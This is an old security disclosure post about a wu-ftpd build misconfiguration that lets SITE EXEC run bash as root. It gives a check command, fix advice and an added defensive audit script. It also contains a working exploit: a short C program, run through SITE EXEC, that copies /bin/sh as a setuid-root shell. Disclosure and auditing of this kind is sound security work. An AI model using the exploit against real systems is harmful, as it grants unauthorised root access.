ObBug:

- Short description of the bug

It involves wu.ftpd being misconfigured at compile time and allowing SITE EXEC access to /bin (for anonymous or otherwise chroot-ed users this is ~ftp/bin). Now if in this /bin resides a program that gives access to executables outside /bin, but within the user's reach (such as /bin/bash, which gives access to the user's homedir), this opens up a root vulnerability.

This should have been set to /bin/ftp-exec, which is set by the _PATH_EXECPATH variable in src/pathnames.h before compiling. The wu-ftpd-2.4_linux.tgz that I found somewhere on the net has this securely set as default value.

- How to check?

    $ ftp -n localhost
    user:
    password:
    ftp> quote site exec bash -c id

If vulnerable it gives here: uid=0, gid=0, euid=, egid=

Of course, bash should not be available at all.

- How to exploit (in case your sysadmin or you think the above is not a problem)

Go to your homedir and make a program: duh.c (or whatever)

    main() {
        seteuid(0);
        setegid(0);
        system("/bin/cp /bin/sh ./sh");
        system("/bin/chmod 6755 ./sh");
    }

    $ make duh
    $ ftp -n localhost (and login)
    user:
    password:
    ftp> quote site exec bash -c duh
    ftp> quit
    $ ./sh
    bash#

(voila, QED)

- How to fix?

Get the source of wu-ftpd-2.4.linux.tar.gz (stock wu-ftpd-2.4 from wuarchive doesn't compile on linux) and compile it; you might want to define the _PATH_PIDNAMES and _PATH_XFERLOG to other values there... (/usr/adm/ftp.pids-%s and /usr/adm/xferlog for example).

If you cannot find that I can email the source to you... if you trust the source I took somewhere unmodified and if you trust me ;-)

An arch search for wu-ftpd-2.4 will give you sites too. I can remember that I got it that way.

$) Henri Karrenbeld
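
A defender-side audit for the misconfiguration described above, as an added example that is not part of the original post: it reads _PATH_EXECPATH from a pathnames.h and lists shells or interpreters sitting in the SITE EXEC directory. The `#define` line format, the function names and the list of interpreter names are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post).

# Print the compiled-in SITE EXEC directory from a pathnames.h file.
# Assumed line format:  #define _PATH_EXECPATH "/bin/ftp-exec"
execpath_of() {
    sed -n 's/^[[:space:]]*#[[:space:]]*define[[:space:]]\{1,\}_PATH_EXECPATH[[:space:]]\{1,\}"\([^"]*\)".*/\1/p' "$1" | head -n 1
}

# Return 0 if the header leaves SITE EXEC pointing at /bin,
# 1 if it points elsewhere, 2 if the definition was not found.
header_is_risky() {
    p=$(execpath_of "$1")
    case "$p" in
        "")         echo "$1: _PATH_EXECPATH not found"; return 2 ;;
        /bin|/bin/) echo "$1: _PATH_EXECPATH is $p (SITE EXEC reaches all of /bin)"; return 0 ;;
        *)          echo "$1: _PATH_EXECPATH is $p"; return 1 ;;
    esac
}

# List shells and interpreters present in a SITE EXEC directory.
# The name list is illustrative (an assumption); extend it for your site.
shells_in() {
    for name in sh bash csh tcsh ksh zsh ash perl; do
        if [ -e "$1/$name" ]; then echo "$1/$name"; fi
    done
    return 0
}

# Constructed sample input: a header with the risky value and a fake bin dir.
demo() {
    d=$(mktemp -d)
    printf '#define _PATH_EXECPATH "/bin"\n' > "$d/pathnames.h"
    mkdir "$d/bin"; : > "$d/bin/bash"; : > "$d/bin/ls"
    header_is_risky "$d/pathnames.h"
    shells_in "$d/bin"
    rm -rf "$d"
}

# Usage: audit.sh demo   |   audit.sh <pathnames.h> <site-exec-dir>
if [ "${1:-}" = "demo" ]; then
    demo
elif [ $# -eq 2 ]; then
    header_is_risky "$1"
    shells_in "$2"
fi
```

Any path printed by `shells_in` means SITE EXEC can start a program that runs executables from outside the intended directory.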